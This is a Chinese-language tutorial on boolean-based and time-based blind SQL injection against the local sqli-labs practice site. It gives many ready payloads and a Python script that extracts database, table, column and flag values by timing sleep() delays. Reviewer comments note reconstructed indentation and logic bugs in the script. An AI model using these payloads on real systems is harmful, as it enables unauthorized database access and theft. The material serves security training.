SQL注入__布尔盲注和时间盲注
布尔盲注
sql盲注二分法注入脚本
猜测数据库
?id=1' and length(database())=8-- -
?id=1' and length(database())>8-- -
猜测当前数据库名的第一位:截取数据库名的第一个字符,通过ASCII码值比较
id=1' and left(database(),1)>'a' -- -
id=1' and left(database(),1)>'z' -- -
在a-z之间
id=1' and left(database(),1)>'r' -- -
id=1' and left(database(),1)>'s' -- -
id=1' and left(database(),2)>'sa'-- -
猜测表
id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit a,1),b,1))>n
a是表的序号(从0开始计数),b是表名的第几个字符(从1开始计数),n是该字符ASCII码对应的十进制数
substr("abc",1,1) 切割函数 从第一位开始切割 切割第一个 返回a
substr("abc",2,1) 切割函数 从第二位开始切割 切割一个 返回b
substr("abc",1,2) 从第一位开始切割 切割两位 返回ab
substr("abc",0,1) #PHP中下标从0开始,MySQL中从1开始,所以MySQL里位置0会返回空串
第一个表
ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101
(select table_name from information_schema.tables where table_schema=database() limit 0,1)返回第一个表
substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)切割第一位
ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101
ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>102
第二个表
ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=101
判断user表
/sqlitest/Less-5/?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='user' limit 0,1),1,1))>100%23
爆出字段
ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=101
ord()绕过ascii() mid()绕过substr()
sqlitest/Less-5/?id=1' and ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))=68-- -
参考:https://blog.csdn.net/weixin_53324462/article/details/113800035
时间盲注
盲注
时间盲注
sleep(X)函数,延迟X秒后回显
?id=1' and sleep(5)-- -
if(判断语句,x,y)如果判断语句正确则输出X,否则输出Y
?id=1' and if(1=1,1,sleep(1))即输出1
?id=1' and if(1=2,1,sleep(1))即延迟1秒后回显
?id=1' and if(length(database())>8,sleep(2),0)
?id=1' and if(length(database())>=8,sleep(5),1)-- -
判断库名
?id=1' and if(ascii(substr(database(),1,1))=115,sleep(2),0) --+
?id=1' and if(ascii(substr(database(),1,1))>95,sleep(6),1)-- -
判断表名
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit x,y),z,d))=e,sleep(1),0)- --
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100,sleep(2),1)-- -
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100,sleep(5),1)-- -
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),2,1))=109,sleep(3),0)--+
参考:https://blog.csdn.net/qq_51954912/article/details/116100446
时间盲注又称延迟注入,适用于页面不会返回错误信息、只会回显同一种界面的情况,其主要特征是利用sleep函数制造时间延迟,由响应时间来判断注入条件是否成立。
官方理解:利用sleep()或benchmark()等函数让MySQL执行时间变长,经常与if(expr1,expr2,expr3)语句结合使用,通过页面的响应时间来判断条件是否正确。if(expr1,expr2,expr3)的含义是如果expr1为True则返回expr2,否则返回expr3。
1、判断闭合符号
if(判断语句,x,y)如果判断语句正确则输出X,否则输出Y
sleep(X)函数,延迟X秒后回显
if(1=1,1,sleep(1))即输出1
if(1=2,1,sleep(1))即延迟1秒后回显
2、判断库名长度
?id=1' and if(length(database())>8,sleep(2),0) --+
3、判断库名
?id=1' and if(ascii(substr(database(),1,1))=115,sleep(2),0) --+
此为判断第一个字母的ascii码是否为115
4、判断表名
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit x,y),z,d))=e,sleep(1),0)--+
其中limit x,y的x表示从第x+1个表开始(x从0计数),y表示取y个表;substr的z表示从表名的第z个字符开始(z从1计数),d表示取d个字符
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101,sleep(1),0)--+
逐个尝试
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1))=117,sleep(3),0)--+
5、判断列名
?id=1' and If(ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit x,y),z,d))=105,sleep(2),1)--+
x:从第x+1个列开始(x从0计数),y:取y个列,z:从列名的第z个字符开始(z从1计数),d:取d个字符
?id=1' and If(ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 0,1),1,1))=105,sleep(2),1)--+
逐个尝试
6、爆数据
?id=1' and If(ascii(substr((select username from users limit 0,1),1,1))=68,sleep(2),1)--+
时间盲注脚本
import requests
import time
import datetime
# Base URL of the local sqli-labs exercise; every function below appends its
# payload to this query string.  The commented-out line points at Less-4 instead.
# Each recovered character costs up to 95 sequential requests (codes 32..126),
# each forcing a 2 s sleep() on the database side -- a pattern that stands out
# in slow-query logs and per-client request-rate monitoring.
url = "http://127.0.0.1/sqlilabs/Less-9/?id=1'"
#url = "http://127.0.0.1/sqlilabs/Less-4/?id=1"
def get_dbname():
    """Recover the current database name via time-based blind injection (sqli-labs).

    Positions 1..8 of database() are probed one at a time; for each position
    every printable ASCII code 32..126 is sent inside an if(<cond>,sleep(2),1)
    payload, and a response that took more than one whole second is treated
    as a hit.  Prints the recovered name; returns None.

    NOTE: the source's indentation was lost; the nesting below is reconstructed.
    """
    dbname = ''
    for i in range(1,9):
        for k in range(32,127):
            payload = " and if(ascii(substr(database(),{0},1))={1},sleep(2),1)--+".format(i,k)
            #payload = '") and if(ascii(substr(database(),{0},1))={1},sleep(2),1)--+'.format(i,k)
            # payload = " and if(ascii(substr(database(),{0},1))={1},sleep(2),1) --+".format(i,k)
            # sleep(2) in the if() fires when the condition is true; swapping it
            # with the 1 inverts which outcome is the slow one.
            time1 = datetime.datetime.now()
            # wall-clock time just before the request is sent
            res = requests.get(url + payload)
            # the response body is never inspected: only the elapsed time is used
            time2 = datetime.datetime.now()
            # wall-clock time after the response arrived
            difference = (time2 - time1).seconds
            # timedelta.seconds is the whole-seconds component (truncated), so a
            # 2 s sleep plus latency lands at >= 2 and clears the > 1 test
            if difference > 1:
                dbname += chr(k)
                # NOTE(review): no break here, so the remaining k values for this
                # position are still requested; a response that is slow because of
                # latency rather than sleep() would append an extra character.
            else:
                continue
    # printed once after all eight positions have been probed (placement inferred
    # from the lost indentation)
    print("数据库名为->"+dbname)
get_dbname()  # module-level call: runs at import time, there is no __main__ guard
def get_table():
    """Recover table names of the `security` schema via time-based blind injection.

    i selects the table (limit i,1 over information_schema.tables), j the
    character position inside the name, k the ASCII code under test.  Each hit
    is appended to the buffer for that table and the partial name is printed.
    Returns None.

    NOTE: indentation was lost in the source; the nesting below -- in
    particular which `if` the final `else: break` belongs to -- is reconstructed.
    """
    table1 = ''
    table2 = ''
    table3 = ''
    table4 = ''
    for i in range(5):
        # j starts at 0, but MySQL substr() positions start at 1, so the j == 0
        # round yields '' (ascii 0) and can never match a printable code
        for j in range(6):
            for k in range(32,127):
                payload = "and if(ascii(substr((select table_name from information_schema.tables where table_schema=\'security\' limit %d,1),%d,1))=%d,sleep(2),1)--+"%(i,j,k)
                time1 = datetime.datetime.now()
                res = requests.get(url + payload)
                # only the elapsed time is used; the body is ignored
                time2 = datetime.datetime.now()
                difference = (time2-time1).seconds
                if difference > 1:
                    if i == 0:
                        table1 += chr(k)
                        print("第一个表为->"+table1)
                    elif i == 1:
                        table2 += chr(k)
                        print("第二个表为->"+table2)
                    # NOTE(review): i == 2 is never handled -- table3 is filled from
                    # the fourth table (i == 3) and table4 from the fifth, so the
                    # third table's name is not collected; as reconstructed here a
                    # hit at i == 2 falls through to the else and breaks the k loop
                    elif i == 3:
                        table3 += chr(k)
                        print("第三个表为->"+table3)
                    elif i == 4:
                        table4 += chr(k)
                        print("第四个表为->"+table4)
                    else:
                        break
get_table()  # module-level call; executes whenever the file is imported or run
def get_column():
    """Recover up to three column names of the `flag` table via time-based blind injection.

    i selects the column (limit i,1 over information_schema.columns, with no
    table_schema filter), j the character position 1..8, k the ASCII code under
    test.  Hits are appended to the per-column buffer and printed.  Returns None.

    NOTE: indentation was lost in the source; the nesting below -- especially
    which `if` the trailing `else: break` belongs to -- is reconstructed.
    """
    column1 = ''
    column2 = ''
    column3 = ''
    for i in range(3):
        for j in range(1,9):
            for k in range(32,127):
                payload = "and if(ascii(substr((select column_name from information_schema.columns where table_name=\'flag\' limit %d,1),%d,1))=%d,sleep(2),1)--+"%(i,j,k)
                time1 = datetime.datetime.now()
                res = requests.get(url+payload)
                # only the elapsed time is used; the body is ignored
                time2 = datetime.datetime.now()
                difference = (time2-time1).seconds
                if difference > 1:
                    # plain `if`s rather than elif: as reconstructed, the else/break
                    # pairs with `if i == 2`, so a hit for i in {0, 1} breaks out of
                    # the k loop while a hit for i == 2 does not
                    if i == 0:
                        column1 += chr(k)
                        print("字段一为->"+column1)
                    if i == 1:
                        column2 += chr(k)
                        print("字段二为->"+column2)
                    if i == 2:
                        column3 += chr(k)
                        print("字段三为->"+column3)
                    else:
                        break
get_column()  # module-level call; runs at import time
def get_flag():
    """Recover the `flag` column of table `flag` via time-based blind injection.

    i is the character position (0..29), k the ASCII code under test; each hit
    is appended and the partial value printed.  Returns None.

    NOTE: indentation was lost in the source; the nesting below is reconstructed.
    """
    flag = ''
    # i starts at 0, but MySQL substr() positions start at 1, so the first
    # round yields '' (ascii 0) and spends 95 requests without a possible hit
    for i in range(30):
        for k in range(32,127):
            payload = "and if(ascii(substr((select flag from flag),%d,1))=%d,sleep(2),1)--+"%(i,k)
            time1 = datetime.datetime.now()
            res = requests.get(url+payload)
            # only the elapsed time is used; the body is ignored
            time2 = datetime.datetime.now()
            difference = (time2-time1).seconds
            if difference > 1:
                flag += chr(k)
                print("flag为->"+flag)
                # NOTE(review): no break, so the rest of the k range is still sent
                # for this position after a hit
get_flag()  # module-level call; runs at import time